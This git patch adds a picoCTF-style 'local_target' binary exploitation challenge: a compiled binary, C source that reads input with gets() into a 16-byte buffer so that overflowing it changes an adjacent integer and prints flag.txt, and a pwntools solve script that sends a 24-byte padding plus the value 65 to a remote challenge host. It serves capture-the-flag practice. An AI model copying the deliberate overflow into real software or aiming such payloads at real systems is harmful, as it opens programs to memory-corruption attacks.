From 7350f4e9579936105b2854fa4a9e8cb076cbb948 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 20:31:41 +0200
Subject: [PATCH] pwn/local_target

---
 pwn/local_target/local-target   | Bin 0 -> 17088 bytes
 pwn/local_target/local-target.c |  50 ++++++++++++++++++++++++++++++++
 pwn/local_target/solve.py       |  31 ++++++++++++++++++++
 3 files changed, 81 insertions(+)
 create mode 100755 pwn/local_target/local-target
 create mode 100644 pwn/local_target/local-target.c
 create mode 100755 pwn/local_target/solve.py

diff --git a/pwn/local_target/local-target b/pwn/local_target/local-target
new file mode 100755
index 0000000000000000000000000000000000000000..072f668627d6dc758c65b4364fda0415c25b8d46
GIT binary patch
literal 17088
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
J_ZWCY_&3aglF0x7

literal 0
HcmV?d00001

diff --git a/pwn/local_target/local-target.c b/pwn/local_target/local-target.c
new file mode 100644
index 0000000..f20ecdd
--- /dev/null
+++ b/pwn/local_target/local-target.c
@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+
+int main(){
+  FILE *fptr;
+  char c;
+
+  char input[16];
+  int num = 64;
+  
+  printf("Enter a string: ");
+  fflush(stdout);
+  gets(input);
+  printf("\n");
+  
+  printf("num is %d\n", num);
+  fflush(stdout);
+  
+  if( num == 65 ){
+    printf("You win!\n");
+    fflush(stdout);
+    // Open file
+    fptr = fopen("flag.txt", "r");
+    if (fptr == NULL)
+    {
+        printf("Cannot open file.\n");
+        fflush(stdout);
+        exit(0);
+    }
+
+    // Read contents from file
+    c = fgetc(fptr);
+    while (c != EOF)
+    {
+        printf ("%c", c);
+        c = fgetc(fptr);
+    }
+    fflush(stdout);
+
+    printf("\n");
+    fflush(stdout);
+    fclose(fptr);
+    exit(0);
+  }
+  
+  printf("Bye!\n");
+  fflush(stdout);
+}
diff --git a/pwn/local_target/solve.py b/pwn/local_target/solve.py
new file mode 100755
index 0000000..8a32702
--- /dev/null
+++ b/pwn/local_target/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./local-target")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 58138".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  r.recvuntil(b"Enter a string: ")
+  offset = 24 # found with pwndbg
+  payload = b'A' * offset + p64(65)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file